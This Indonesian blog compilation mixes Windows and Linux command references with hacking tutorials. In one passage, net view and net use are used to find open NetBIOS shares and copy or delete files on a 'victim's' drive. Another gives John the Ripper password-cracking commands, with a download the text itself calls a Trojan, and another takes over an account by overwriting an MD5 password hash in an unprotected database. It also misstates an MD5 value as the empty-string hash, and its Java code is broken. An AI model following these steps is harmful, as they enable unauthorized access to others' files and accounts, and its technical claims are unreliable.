Perintah Perintah di Cmd

Net View

Menggunakan Perintah  Net View Pada Cmd

Net view digunakan untuk Melihat computer yang sedang aktif dan terhubung dengan LAN.

Pada command prompt menggunakan perintah “net view” (ATAU ANDA JUGA BISA GUNAKAN “Scanner NB” OPSI DALAM ” ALAT IP “PERANGKAT LUNAK DENGAN MEMASUKI JARAK WAKTU ALAMAT  IP. INI DENGAN METODE ANDA BISA SCAN JUMLAH KOMPUTER ORANG).

Contoh: C:> net view \ \ \ 219.64.55.112

Di atas adalah contoh untuk operasi dengan menggunakan command prompt. “net view”. “Net view” adalah salah satu dari perintah netbios untuk melihat sumber daya  dari komputer yang jauh. Di sini “219.64.55.112″ adalah alamat IP komputer remote yang akan hacked melalui netbios. Anda harus mengganti alamat IP yang asli di  tempat itu. Jika berhasil daftar HARD-DISK DRIVE & printer yang akan ditampilkan. Jika tidak pesan kesalahan ditampilkan. Jadi ulangi prosedur 2 dengan alamat IP yang berbeda.

Net Use

Net use Menghubungkan atau memutus komputer Anda dari sumber daya bersama atau menampilkan informasi tentang koneksi Anda.
Menggunakan perintah Net Use

Setelah berhasil, gunakan “net use” perintah pada command prompt. perintah lain yang memungkinkan untuk hack drive remote atau printer.

Contoh-1:
C: \ net use> D: \ \ 219.64.55.112 \ F
Contoh-2:
C:\>net use G: \\219.64.55.112\SharedDocs

Contoh-3:
C:\>net use I: \\219.64.55.112\Myprint

. CATATAN: Dalam Contoh 1,2 & 3, D:, G: & I: adalah Network Drive Nama yang akan dibuat pada komputer Anda untuk mengakses’s komputer remote hard-disk.
CATATAN: BERIKAN NAMA DRIVE YANG TIDAK DIGUNAKAN OLEH SETIAP DRIVE LAIN TERMASUK-DISK DRIVE HARD, DRIVE FLOPPY DRIVE DAN-ROM PADA KOMPUTER ANDA. ITU ADALAH, JIKA ANDA MEMILIKI C: & D: AS DIRVES HARD, A: SEBAGAI DIVE FLOPPY DAN E: SEBAGAI CD-DRIVE, BERIKAN F: SEBAGAI DRIVE BERSAMA ANDA DI ATAS COMMAND PROMPT

F:, “SharedDocs” adalah nama dari hard drive komputer remote-disk yang ingin Anda hack. “Myprint” adalah nama printer komputer remote. Ini adalah ditampilkan setelah memberi “net use” perintah. “219.64.55.112″ adalah alamat IP dari komputer remote yang ingin Anda hack.

4. 4. Setelah berhasil komputer Anda akan memberikan pesan bahwa “Perintah selesai dengan sukses”. Setelah Anda mendapatkan pesan di atas Anda hanya satu langkah menjauh dari hacking komputer.

Sekarang buka “My Computer” Anda akan melihat sebuah “Hard-Disk drive” baru (Shared) dengan nama tertentu. Anda dapat membuka dan mengakses komputer remote Hard-Drive. You can copy files, music, folders etc. from victim’s hard-drive. Anda dapat menyalin file, musik, dll folder dari hard drive-korban. Anda dapat menghapus / memodifikasi data pada hard-drive korban hanya jika MENULIS-ACCESS diaktifkan pada itu sistem korban. You can access files/folders quickly through “Command Prompt”. Anda dapat mengakses file / folder dengan cepat melalui “Command Prompt”.
CATATAN: Jika Komputer Firewall Remote Diaktifkan Komputer Anda Tidak Akan Sukses Dalam Mendapatkan Akses Untuk Komputer Melalui Remote NetBIOS. Itulah yang terjadi Dalam Situasi ini. (Sebuah Pesan Kesalahan yang di Tampilkan). Jadi Ulangi Prosedur 2,3 Dengan IP Address yang berbeda.

Net local group Menambah, menghapus, melihat, dan sebaliknya mengelola kelompok jaringan.

Net User

Contoh berikut menunjukkan sintaks perintah net pengguna :

net user [username [password | *] [options]] [/domain]
         username {password | *} /add [options] [/domain]
         username [/delete] [/domain]

Anda dapat menggunakan perintah net pengguna untuk membuat dan memodifikasi akun pengguna pada komputer. Bila Anda menggunakan perintah ini tanpa switch baris perintah, akun-akun pengguna komputer yang terdaftar. Informasi account pengguna yang disimpan dalam database account pengguna. Perintah ini bekerja hanya pada server.

Anda dapat menggunakan parameter berikut dengan perintah net pengguna :

  • nama pengguna
    Adalah nama akun pengguna yang Anda ingin menambahkan, menghapus, mengubah, atau melihat. Nama account pengguna dapat memiliki sebanyak 20 karakter.
  • sandi
    Menetapkan atau mengubah sandi untuk account pengguna. Password harus memenuhi panjang minimum yang ditetapkan dengan pilihan /minpwlen perintah account bersih . Itu dapat berisi sebanyak 14 karakter.
  • *
    Menghasilkan sebuah prompt untuk password. Sandi tidak ditampilkan ketika Anda mengetik pada password prompt.
  • /domain
    Melakukan operasi pada kontroler domain utama (PDC) dari domain saat ini. Parameter ini hanya berlaku untuk komputer yang menjalankan Windows NT Workstation yang merupakan anggota domain Windows NT Server. Secara default, komputer berbasis Windows NT Server melakukan operasi pada PDC.
  • / add
    Menambahkan account pengguna ke database account pengguna.
  • /Delete
    Menghapus account pengguna dari pengguna account database.

Pilihan untuk perintah pengguna bersih

  • / aktif: {Ya | tidak}
    Mengaktifkan atau menonaktifkan account. Jika account tidak aktif, pengguna tidak dapat mendapatkan akses ke server.Default adalah ya.
  • / Komentar: “teks”
    Menyediakan komentar deskriptif tentang pengguna akun (maksimum 48 karakter). Pastikan untuk meletakkan tanda kutip di sekitar teks yang Anda gunakan.
  • /countrycode:Zero
    Menggunakan kode negara sistem operasi untuk menerapkan file bahasa tertentu untuk membantu pengguna dan pesan kesalahan. Nilai 0 menandakan kode negara default.
  • / berakhir: {tanggal | pernah}
    Menyebabkan account berakhir jika tanggal ditetapkan. Opsi tidak pernah menetapkan batasan waktu pada rekening.Tanggal kedaluwarsa adalah dalam bentuk mm/dd/yy atau dd/mm/yy, tergantung pada kode negara. Bulan dapat beberapa, mengeja, atau disingkat dengan tiga huruf. Tahun dapat dua atau empat angka. Menggunakan garis miring (/) dengan tidak ada ruang untuk memisahkan bagian dari tanggal.
  • / lengkap: “Nama
    Adalah nama lengkap pengguna (bukan nama pengguna). Sertakan nama dalam tanda kutip.
  • /homedir:Path
    Set path untuk home directory milik user. Jalan harus ada.
  • /passwordchg: {Ya | tidak}
    Menentukan apakah pengguna dapat mengubah password mereka sendiri. Default adalah ya.
  • /passwordreq: {Ya | tidak}
    Menentukan apakah account pengguna harus memiliki password. Default adalah ya.
  • /profilepath [: jalan]
    Set path untuk profil logon pengguna.
  • /scriptpath:Path
    Adalah lokasi pengguna logon script.
  • / kali: {kali | semua}
    Adalah waktu logon. Opsi kali dinyatakan sebagai hari [-hari] [, hari [-hari]], waktu [-waktu] [, waktu [-waktu]], dan dibatasi untuk penambahan 1 jam. Hari dapat mengeja atau disingkat. Jam dapat notasi 12 jam atau 24 jam. Untuk 12-jam notasi, menggunakan am, pm, pagi atau malam. Semua pilihan ini menentukan bahwa pengguna dapat selalu masuk, dan nilai kosong menentukan bahwa pengguna dapat tidak pernah login. Memisahkan hari dan waktu entri dengan tanda koma, dan terpisah beberapa hari dan waktu entri dengan tanda titik koma.
  • /usercomment: “teks”
    Memungkinkan administrator menambahkan atau mengubah komentar pengguna untuk account.
  • /workstations: {computername [,…] | *}
    Daftar sebanyak delapan komputer yang pengguna dapat log on ke jaringan. Jika opsi /workstations memiliki daftar ada atau jika daftar *, pengguna dapat login dari komputer manapun.
  • pengguna bersih bantuan | lebih
    Menampilkan bantuan satu layar pada suatu waktu.

Catatan: Anda dapat memperoleh semua informasi yang terkandung dalam artikel ini dengan mengetik perintah berikut:

bersih bantuan pengguna

Net Group

Alat baris perintah yang dibangun ke dalam Windows Vista. Untuk menjalankan bersih grup, buka command prompt, bersih kelompok jenis dengan parameter yang sesuai, dan kemudian tekan ENTER.

<GroupName> :
Menentukan nama kelompok untuk menambah, memperluas, atau menghapus. Tentukan nama kelompok untuk melihat  daftar pengguna dalam kelompok saja.
/comment:”<Text>” :
Menambahkan komentar untuk kelompok baru atau yang sudah ada. Komentar dapat memiliki sebanyak 48 karakter. Lampirkan teks dalam tanda kutip.
/domain :
Melakukan operasi pada kontroler domain dalam domain saat ini. Jika tidak, operasi dilakukan pada komputer lokal.
/add :
Menambahkan grup, atau menambahkan nama pengguna ke grup. Anda harus membuat account untuk pengguna yang Anda tambahkan ke grup dengan perintah ini.
/delete :
Menghapus grup, atau menghapus nama pengguna dari kelompok.
<UserName>[ …] :
Daftar satu atau lebih nama pengguna untuk menambah atau menghapus dari grup. Pisahkan nama beberapa pengguna dengan spasi.
net help <command> :
Menampilkan bantuan untuk perintah net ditentukan.

Keterangan
Bila Anda menggunakan grup bersih tanpa parameter, perintah ini menampilkan nama server dan nama-nama kelompok pada server.

Anda juga dapat mengetik kelompok bersih untuk mendapatkan output yang sama.

Anda dapat menggunakan grup bersih untuk pengguna kelompok yang menggunakan jaringan dengan cara yang sama atau mirip. Bila Anda menetapkan hak kelompok, setiap anggota kelompok secara otomatis memiliki hak-hak tersebut. Dalam output perintah, bersih kelompok mendahului kelompok yang mencakup baik pengguna dan kelompok dengan tanda bintang (*).

Output bersih kelompok kelompok pada server mirip dengan berikut:

Group Accounts for \\PRODUCTION
———————————————–
*Domain Admins      *Domain Users

Net Local Group

Menambahkan, menampilkan, atau memodifikasi kelompok-kelompok lokal. Digunakan tanpa parameter, net localgroup menampilkan nama server dan nama-nama dari kelompok-kelompok lokal pada komputer.

Syntax

net localgroup [GroupName [/comment:”text]] [/domain]

net localgroup [GroupName {/add [/comment:”text] | /delete} [/domain]]

net localgroup [GroupName name [ …] {/add | /delete} [/domain]]

Parameters

GroupName   Menentukan nama kelompok lokal untuk menambah, memperluas, atau menghapus. Digunakan tanpa parameter tambahan, net localgroup GroupName menampilkan daftar pengguna atau kelompok global dalam kelompok lokal.

/comment:” text    Menambahkan komentar untuk kelompok baru atau yang sudah ada. Komentar dapat berisi hingga 48 karakter. Lampirkan teks dalam tanda kutip.

/domain   Melakukan operasi pada kontroler domain utama dari domain saat ini. Jika tidak, operasi dilakukan pada komputer lokal.

name [ …] Daftar nama pengguna satu atau lebih atau nama kelompok untuk menambah atau menghapus dari kelompok lokal.

/add   : Menambahkan nama kelompok global atau nama pengguna ke kelompok lokal. Anda harus terlebih dahulu membuat account untuk pengguna atau grup global sebelum Anda dapat menambahkannya ke kelompok lokal dengan perintah ini.

/delete   Menghapus nama grup atau nama pengguna dari kelompok lokal.

net help   command   Menampilkan bantuan untuk perintah net ditentukan.

Keterangan
Menggunakan / domain
/ domain hanya berlaku untuk Windows XP Professional komputer yang menjadi anggota dari sebuah domain. Secara default, komputer server melakukan operasi pada kontroler domain utama.
menggunakan nama
Pisahkan beberapa entri dengan spasi. Nama dapat menjadi pengguna lokal, pengguna di domain lainnya, atau kelompok global, namun kelompok-kelompok lokal tidak lain. Jika pengguna adalah dari domain lain, Pendahuluan nama pengguna dengan nama domain (misalnya, Penjualan \ Ralphr).
pengelompokan pengguna
Gunakan net localgroup untuk pengguna kelompok yang menggunakan komputer atau jaringan dengan cara yang sama atau mirip. Bila Anda menetapkan hak kelompok lokal, masing-masing anggota kelompok lokal secara otomatis memiliki hak yang sama.

Jhon Ripper

imagessekarang saya mencoba untuk berbagi ilmu kepada anda semua , (saya tidak bertanggung jawab apabila terjadi kerusakan pada  software dan pc anda  atas kerusakan akibat sofware ini karena software adalah virus yang sengaja dibuat, TROJAN HORSE)jadi jangan diinstall di pc anda  :D . penulis tidak menyarankan penggunaan aplikasi ini untuk tindak kejahatan, tetapi penulis hanya ingin berbagi pengatahuan.

instalasi John the Ripper pada windows dan saya akan membahas beberapa tipe dasar serangan dan hal-hal yang dapat Anda lakukan dengan John the Ripper. Artikel ini akan cukup panjang dan saya coba menjelaskan dengan bahasa ala kadarnya yang saya harap dapat dimengerti.

Sekarang mari kita mulai tutorial :

– Download John the Ripper 1.7.0.1 (Windows – binaries, ZIP, 1360 KB) klik DISINI

Beberapa tips yg akan mempermudah saat menginstal John the Ripper pada windows

1. Simpan di C:/ , jangan di program files maupun folder apapun.
2. Ketika menginstal mungkin akan terlihat seperti C: / John/john1701 / dll Pindahkan semuanya keluar dari folder john1701 dan masuk ke folder pertama. Kemudian hapus john1701.
3. Sekarang ketika Anda masuk ke drive C anda dan membuka folder john, Anda akan melihat kedua folder doc untuk menjalankan, bukan john1701
4. Dalam run folder Anda akan melihat aplikasi “john-386″ atau “john-sesuatu”. Hanya ganti nama ke “john”

Untuk menjalankan JTP, kita membukanya melalui garis perintah ms-dos
Go Start, run, dan ketik cmd
ketikkan perintah ini: cd C: / john / run

Sekarang kita masuk ke bebrapa jenis attack melalui JTP.

-Bruteforce Attack-
Pertama saya akan menunjukkan modus JTP bruteforcing. mode ini adalah mencoba setiap kombinasi yang memungkinkan dari huruf (baik besar dan huruf kecil), angka, simbol atau kombinasi dari tiga sampai menemukan password. Sebelum saya memberitahu Anda bagaimana untuk melakukannya, kita harus mengambil hash (Saya akan menggunakan bentuk: CRjRYEn9g3PUc dari atas), menyalin dan masa di notepad, dan simpan di direktori “run” dalam John the Ripper sebagai file txt. Saya menyebutnya hash.txt. Salah satu cara untuk melakukan serangan jenis ini adalah untuk ketik “hash.txt john” (semua perintah tanpa tanda kutip) dan tekan enter. Ini akan mulai mencoba bruteforce password. Cara lain adalah dengan drag file hash.txt dan drop pada aplikasi john (ini akan dilakukan di folder run). Kekurangan dari bruteforce attack adalah memerlukan waktu yang sangat lama, tapi proses bisa dihentikan dengan mengetik perintah “ctrl + C”.

-Bruteforce Attack with conditions-
Cara ini lebih singkat. Jadi jika Anda berpikir password hanya berisi huruf Anda dapat menggunakan perintah “john-i: alpha hash.txt”, jika Anda berpikir password hanya berisi angka yang Anda dapat menggunakan perintah “john-i: hash.txt digit”, Anda juga dapat menggunakan perintah “john-i: semua hash.txt” untuk menebak password yang menggunakan kedua huruf dan angka.

-Dictionary Attack-
Cara ini dilakukan saat kita berhadapan dengan password cengan kombinasi yang panjang. tetapi metode ini lebih cepat dibandingkan apabila kita menggunakan bruteforce attack, tetapi membutuhkan ketelitian, karena kita perlu membuat daftar kata (sesuai kamus) dan jtp akan mencocokan setiap huruf yang sesuai dengan daftar yang telah kita buat.
Untuk contoh ini daftar kata saya sebut “wordlist.txt”.
Untuk melakukan Dictionary Attac, ketik perintah ini: john-w: hash.txt wordlist.txt

Ketika cracking password telah dilakukan,kita dapat memeriksanya dengan menggunakan perintah engan menggunakan perintah “hash.txt john-show”

masih banyak lagi kegunaan software ini, cukup sekian tutor dari saya,, semoga bermanfaat

sumber : http://nandadilala.wordpress.com/2011/05/27/cara-menginstal-john-the-ripper-di-windows-untuk-mencuri-password/

User dan Group di OS Windows dan OS Linux

  1. Add User dan Group di OS Windows

Cara menambahkan User dan Group di Windows

Membuat user account di komputer rumah merupakan sebuah keharusan karena dengan adanya user account Anda sebagai Administrator dapat dengan mudah mengorganisasi pengguna komputer. Apalagi jika komputer rumah merupakan komputer yang digunakan bersama-sama oleh seluruh anggota keluarga.

Membuat user account di Windows 7 sebenanya  tidak jauh berbeda dengan membuatnya di Windows Xp atau Vista, tetapi memang ada beberapa posisi menu di control panel yang tidak sama sehingga sebagian orang akan kesulitan menemukan link yang benar.

Keberadaan user account tidak hanya memberikan kemudahan organisasi komputer, tetapi Anda dapat mengontrol penggunaan aplikasi sekaligus membatasi akses pengguna atas file dan folder di dalam komputer terutama apabila anak Anda belum paham benar dengan sistem komputer yang beresiko merusak file atau program.

kita  akan langsung masuk ke cara membuat user account di Windows 7.

Klik tombol Start dan klik Control Panel.

Kemudian klik User Accounts and Family Safety.

 

cara membuat user account di windows 7

Setelah halaman terbuka kembali, klik Add or remove user accounts.

cara membuat user account di windows 7

Di halaman ini Anda akan melihat daftar akun yang sudah dibuat sebelumnya, klik Create a new account.

cara membuat user account di windows 7

Pada kotak kosong isi dengan nama akun yang Anda inginkan, misalnya untuk istri, dalam kasus ini saya isi dengan nama akun Mama. Anda dapat menggunakan nama lain sesuka Anda. Kemudian pilih jenis akun, sebaiknya klik Standard userlalu klik tombol Create Account.

cara membuat user account di windows 7

Selesai, sekarang akun dengan nama Mama telah berhasil dibuat, selanjutnya Anda dapat menambahkan password, mengedit nama, menambahkan gambar, mengganti jenis akun atau menghapus akun. Klik nama akun dan lakukan organisasi akun sesuai dengan kebutuhan Anda.

cara membuat user account di windows 7

Membuat user account di komputer tidak hanya memudahkan administrator dalam mengatur pengguna, aplikasi dan data komputer, tetapi juga dapat membantu Anda menjaga privasi akun karena setiap akun hanya dapat melihat history browser dan dokumen di dalam akunnya sendiri sehingga setiap aktifitas akun lain tidak akan diketahui kecuali level akun Anda administrator.

  1. Add User dan Group di OS Linux

root@bt:~# adduser d1d1

Adding user `d1d1′ …
Adding new group `d1d1′ (1001) …
Adding new user `d1d1′ (1001) with group `d1d1′ …
Creating home directory `/home/d1d1′ …
Copying files from `/etc/skel’ …
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
Changing the user information for d1d1
Enter the new value, or press ENTER for the default
Full Name []: Didi dCross
Room Number []: 2
Work Phone []: 081917035050
Home Phone []:
Other []: http://www.lombokcyber.org
Is the information correct? [Y/n] y
root@bt:~#

Contoh di atas merupakan salah satu contoh cara membuat User baru di sistem Operasi Linux. sebenarnya menambah user baru merupakan hal yang gampang, tetapi bagi pengguna baru dalam sistem operasi linux merupakan hal tidak gamapang tetapi juga tidak sulit, apalagi dalam tutorial ini saya buat dengan Distro turunanDebian yaitu Linux Ubuntu 10.10 dan berevolusi menjadi BT5 atau Backtrack 5 yang merupakan Sistem Operasi Linux minimalisir, dalam artian banyak dari fitur-fitur standarnya sudah di nonaktifkan seperti adduser via GUI bukan terminal seperti tutorial ini, dan banyak lagi fitur-fitur standar yang dihilangkan.

Sama halnya dengan user, maka group yang ada pada sistem juga bisa ditambah, dirubah dan dihapus. Prosesnya jauh lebih sederhana daripada manajemen user. Untuk menambahkan group ke dalam daftar group account, gunakan perintah groupadd yang syntax-nya adalah sebagai berikut :

1 # groupadd [-g gid] [-r] <group>

Dimana :

  •  -g digunakan untuk memberikan nomor gid (group identity), dengan ketentuan bahaw gid di bawah 500 digunakan oleh system group, sedangkan untuk group biasa menggunakan gid 500 ke atas.
  •  -r digunakan untuk memberikan nomor gid bagi system group.

Hal lain yang perlu diingat adalah bahwa pemberian nomor gid ini juga harus unik, sama halnya seperti pemberian nomor uid (user id). Untuk mengetahui daftar group yang sudah ada beserta nomor gid yang digunakan, bisa dilihat pada file /etc/group.

01

02

03

04

05

06

07

08

09

10

# cat /etc/group

root:x:0:

bin:x:1:

daemon:x:2:

sys:x:3:

:

:

:

tamu:x:500:

newbie:x:501:

Jika Anda melupakannya, perintah cat digunakan untuk menampilkan isi suatu file.

Sekarang kita akan mencoba untuk menambahkan group dengan perintah groupadd. Jika perintah groupadd ini dijalankan tanpa parameter –g dan –r, maka group yang baru ini akan secara otomatis diberi nomor gid satu angka diatas nomor gid group biasa  yang terakhir.

01

02

03

04

05

06

07

08

09

10

11

12

# groupadd pemula

# cat /etc/group

root:x:0:

bin:x:1:

daemon:x:2:

sys:x:3:

:

:

:

tamu:x:500:

newbie:x:501:

pemula:x:502:

Bagaimana jika kita nekad juga menggunakan gid yang sama dengan gid yang telah dibuat sebelumnya. Maka tentu saja akan menghasilkan pesan kesalahan (error) yang menyatakan bahwa nomor gid tersebut sudah digunakan oleh group yang lain.

3. Atur Hak Akses

Windows:

Untuk melakukan perubahan Control Pada User Account Control, ikuti petunjuk di bawah ini:

  • Buka Control Panel
  • Klik System and Security
  • Klik Action Center
  • Klik Change User Account Control Settings
  • Lakukan perubahan sesuai dengan keingingan.
  • Jika sudah selesai, klik tombol OK.

Enkripsi MD5

Enkripsi MD5 dan pengujian integritas data

MD5 adalah …. (pengertian MD5)

Dalam Kriptografi (ilmu dan seni untuk menjaga kerahasiaan berita), MD5 yang merupakan singkatan dari Message-Digest algortihm 5, adalah fungsi hash (prosedur terdefinisi atau fungsi matematika yang mengubah variabel dari suatu data yang berukuran besar menjadi lebih sederhana) kriptografik yang digunakan secara luas dengan hash value 128-bit. MD5 dimanfaatkan dalam berbagai aplikasi keamanan, dan umumnya digunakan untuk meguji integritas sebuah file.

Algoritma MD5Hash-hash MD5 sepanjang 128-bit (16-byte), yang dikenal juga sebagai ringkasan pesan, secara tipikal ditampilkan dalam bilangan heksadesimal 32-digit. Berikut ini merupakan contoh pesan ASCII sepanjang 43-byte sebagai masukan dan hash MD5 terkait:

MD5(“The quick brown fox jumps over the lazy dog”) = 9e107d9d372bb6826bd81d3542a419d6

Bahkan perubahan yang kecil pada pesan akan (dengan probabilitas lebih) menghasilkan hash yang benar-benar berbeda, misalnya pada kata “dog”, huruf d diganti menjadi c:

MD5(“The quick brown fox jumps over the lazy cog”) = 1055d3e698d289f2af8663725127bd4b

Hash dari panjang-nol ialah:

MD5(“”) = d41d8cd98f00b204e9800998ecf8427e

Sajian lengkap mengenai algoritma enkripsi MD5 dapat Anda simak di sinihttp://id.wikipedia.org/wiki/MD5

sumber : id.wikipedia.org

MD5 Tool (MD5 Converter)

Untuk melakukan konversi secara instan, telah banyak disediakan tool-tool di internet baik berupa aplikasi dekstop, maupun aplikasi berbasis web, untuk melakukan konversi dari plain (teks terang) ke enkripsi MD5 maupun sebaliknya (atau lebih dikenal dengan istilah MD5 Reverse). Seperti halnya dari situs http://md5.gromweb.com dan beberapa situs serupa.

MD5 Checksum

MD5 Checksum Verifier SoftwareSedangkan untuk aplikasi pengujian integritas sebuah file atau lebih dikenal dengan istilah MD5 Checksum, dapat menggunakan aplikasi desktop atau aplikasi berbasis web MD5 Checksum seperti“MD5 Checksum Verifier”(dapat diunduh di sini) dan sebagainya. Software semacam ini akan menghasilkan kode MD5 dari file yang diuji integritasnya. Selanjutnya kode MD5 ini akan digunakan untuk menguji apakah file tersebut memiliki integritas ataukah tidak. Artinya jika file akan diberikan atau dikirimkan atau diunduh, si penerima dapat mencocokkan dengan yang diterima apakah ukuran, struktur, dan jenis file sesuai dengan yang diberikan oleh si pembuat file. Contohnya jika Anda men-download sebuah file, kemudian diberikan juga kode MD5 Checksum-nya, jika diperiksa (divalidasi) dengan tool seperti MD5 Checksum Verifier, dinyatakan valid atau sama dengan file yang diuji, maka dikatakan file tersebut tak mengalami perubahan dari pengirim hingga ke tangan Anda. (perubahan bisa terjadi karena virus dan sebagainya)

Pengujian semacam ini ditujukan untuk memastikan suatu file tidak disisipi atau corrupt (hilangnya sebagian) atau mungkin terinveksi, baik itu karena virus, malware, atau injeksi software berbahaya lainnya.

ENKRIPSI MD5 DENGAN JAVA

\Enkripsi MD5 ini hanya untuk text aja, kalau untuk file silahkan kembangkan lagi dengan class FileInputStream dan StringBuilder… Java juga mendukung banyak jenis enkripsi pada kelasMesageDiggest dengan method getInstance(); . Soo silahkan coba – coba untuk membuat enkripsi yang lain. Suatu saat mungkin anda membutuhkan class yang telah anda buat.

Okeh ini sourcenya :

01 import java.security.MessageDigest;
02 import java.security.NoSuchAlgorithmException;
03
04 /**
05  *
06  * @author Lalu Erfandi Maula Yusnu
07  */
08 public class ConverterUtil {
09
10     /**
11      * This nethod is used for encrypt String to MD5
12      * @param text String
13      * @return String
14      */
15     public static String MD5(String text){
16         String output       = null;
17         try {
18             MessageDigest dg = MessageDigest.getInstance("MD5");
19             dg.reset();
20             dg.update(stringToBytes(text));
21             byte[] hasher   = new byte[32];
22             hasher          = dg.digest();
23             return bytesToHexString(hasher);
24         catch (NoSuchAlgorithmException e) {
25             System.out.println("There is No MessageDigest Instance of MD5");
26             System.exit(1);
27         }
28
29         return output;
30     }
31
32     /**
33      * This method used for converting byte array to hex string
34      *
35      * @param hasher byte[]
36      * @return String
37      */
38     public static String bytesToHexString(byte[] hasher){
39         String HEXES        =  "0123456789abcdef";
40         StringBuilder hex   =  new StringBuilder( 2 * hasher.length );
41         for final byte b : hasher ) {
42             hex.append(HEXES.charAt((b & 0xF0) >> 4))
43             .append(HEXES.charAt((b & 0x0F)));
44         }
45         return hex.toString();
46     }
47
48     /**
49      * This method used for converting byte array to string
50      * @param hasher byte[]
51      * @return String
52      */
53     public static String bytesToString(byte[] hasher){
54         String hex = bytesToHexString(hasher);
55         return hexToString(hex);
56     }
57
58     /**
59      * This method used for converting string to bytes
60      * @param str String
61      * @return byte[]
62      */
63     public static byte[] stringToBytes(String str){
64         int len = str.length();
65         byte[] out = new byte[len];
66         for (int i=0; i<len; i++) out[i] = (byte) ( str.charAt(i) & 0xFF);
67         return out;
68     }
69
70
71     /**
72      * This method used for converting hex to string
73      * @param hexString String
74      * @return String
75      */
76     public static String hexToString(String hexString){
77         StringBuilder sb = new StringBuilder();
78         for(int i=0; i<hexString.length()-1; i+=2 ){
79             int decimal = Integer.parseInt(hexString.substring(i, (i + 2)), 16);
80             sb.append((char)decimal);
81         }
82         return sb.toString();
83     }
84
85 }

nah untuk menggunakan source ini ini sintaksnya:

1 Public class Test {
2     public static void main(String[] args){
3         String text="Ini text yang akan di enkripsi dengan MD5";
4         String md5 = ConverterUtil.MD5(text);
5         System.out.println(md5);
6     }
7 }

Hasilnya kurang lebih seperti ini :
6ddc9d6e411d0dfe769750b07d5ffb08


Amankah Password hanya dienkripsi dengan MD5?

Artikel ini saya tulis atas permintaan seorang pembaca di blog ini yaitu Mas Pramana Ajus yang dimintakan di halaman Tanya Admin didalam blog ini. Sebenarnya Enkripsi MD5, bisa dikatakan cukuplah mudah dan tanpa tutorial sekalipun setiap orang bisa membuat aplikasi yang menghasilkan enkripsi MD5, karena PHP sendiri sudah menyediakan fungsi built ini untuk MD5.

Namun pada tutorial kali ini saya ingin lebih mengedepankan masalah Security, karena kita tau MD5 tidaklah cukup mumpuni sebagai proteksi data penting, terutama password. MD5 menurut pengalaman saya relative mudah untuk di pecahkan dengan cara Dekripsi maupun dengan cara-cara algoritma lainnya. Contoh penggunaan MD5 yang biasa digunakan orang dalam mengenkripsi suatu password, kira-kira adalah seperti di bawah ini :

  1. <h2><center>Enkripsi MD5</center></h2>
  2. <center>
  3. <form method=post action=enkripsi.php />
  4. <input name=data type=text>
  5. <input name=submit type=submit value=Enkrip />
  6. </form>
  7. </center>
  8. <br>
  9. <center>
  10. <?php
  11. $data=md5($POST[data]);
  12. if ($_POST[submit]==”Enkrip”)
  13. {
  14. echo “Hasil Enkripsi dengan MD5 dari kata <i><b>’$_POST[data]'</b></i> adalah <br/>”;
  15. echo $data;
  16. }
  17. ?>

Dan jika saya menjalankan program dan memasukkan kata “Daud Edison Tarigan” untuk dienkripsi akan menghasilkan tampilan seperti ini :

  1. Hasil Enkripsi dengan MD5 dari kata ‘Daud Edison Tarigan’ adalah
  2. d41d8cd98f00b204e9800998ecf8427e

Sekilas hasil enkripsi tersebut memang sudah sangat sulit untuk dipecahkan artinya. Namun saat ini sudah banyak software yang digunakan untuk memecahkan sandi dari MD5. Selain itu ada satu teknik dasar yang cukup mudah untuk memecahkan password suatu system berbasis website yang passwordnya hanya dienkripsi dengan MD5. Bagaimana caranya? Sebenarnya mudah saja kalau kita memiliki akses kedalam database aplikasi yang mau di tuju. Sebagai contoh adalah aplikasi yang teman-teman install di PC sendiri menggunakan XAMPP. Standartnya ketika kita menginstall XAMPP, MySQL tidak dilengkapi dengan password (NO PASSWORD). Sehingga akan memudahkan orang membaca data database kita misalnya data password yang kita gunakan.

Kita misalkanlah kita membuat aplikasi yang passwordnya dienkripsi dengan MD5. Katakanlah password aslinya adalah “Daud Edison Tarigan” dimana hasil MD5 adalah “d41d8cd98f00b204e9800998ecf8427e” seperti contoh diatas. Maka didalam database kita akan menemukan Field Password berisi data “d41d8cd98f00b204e9800998ecf8427e” . Nah jika kita ingin masuk ke system, tentunya kita harus login dengan menggunakan password asli (yaitu “Daud Edison Tarigan”) bukan password hasil enkripsi MD5 (yaitu “d41d8cd98f00b204e9800998ecf8427e”). Sementara dari dalam database kita hanya menemukan password dalam bentuk sudah terenkripsi. Bagaimana cara memecahkan kode terenkripsi ini?? Kalau metode saya, tidak perlu dipecahkan cukupgantikan isi password terenkripsi tersebut dengan data tersenkripsi lainnya. Bagaimana cara menggantikannya dengan data terenkripsi lainnya??

Misalnya kita ingin merubah password tersebut menjadi password yang lain yaitu “Daud AplikasiPHP”. Maka kita hanya perlu mengenkripsi password “Daud AplikasiPHP” kedalam bentuk MD5. Kode untuk merubah enkripsi ini adalah :

  1. < ?php
  2. $password=”Daud AplikasiPHP”;
  3. $enkripsi = md5($password);
  4. echo “Hasil enkripsi dari $password adalah : “;
  5. echo $enkripsi;
  6. ?>

Jika program diatas kita jalankan, maka hasilnya akan terlihat seperti dibawah ini :

  1. Hasil enkripsi dari Daud AplikasiPHP adalah : 4eb4263ff560260e4bace23bded3419a

Nah hasil enkripsi MD5 inilah yang akan kita gunakan untuk menggantikan Password yang telah terenkripsi didatabase yang kita temukan tadi. Copy kan data terenkripsi ini dan Edit Isi Field Password didalam database sehingga data dalam field Password adalah hasil enkripsi baru ini. Dengan kata lain, sebelumnya dalam field password berisi data “d41d8cd98f00b204e9800998ecf8427e”, namun setelah kita rubah akan menjadi “4eb4263ff560260e4bace23bded3419a”, yang artinya juga bahwa password aslinya telah berubah dari “ Daud Edison Tarigan” menjadi password baru “ Daud AplikasiPHP ”. Nah anda sekarang bisa login dengan password baru dan anda sudah dapat mengendalikan system tersebut.

Nah dari penjelasan ini, anda sudah bisa membayangkan bukan bahwa MD5 tidaklah cukup aman sebagai proteksi sebuah password. Nah, bagaimana caranya agar password kita aman?? Tunggu artikel saya selanjutnya ya….

Kata Kunci : Enkripsi MD5| PHP Security

Sumber : http://aplikasiphp.com

Mencari Tools untuk :

1. Brute Force

NIX-Brute Force (password cracking tool )

Pada postingan kali ini saya hanya akan preview sedikit tentang sebuah tool NIX Brute Force yang kebanyakan digunakan oleh para pentester untuk login kesebuah system target.
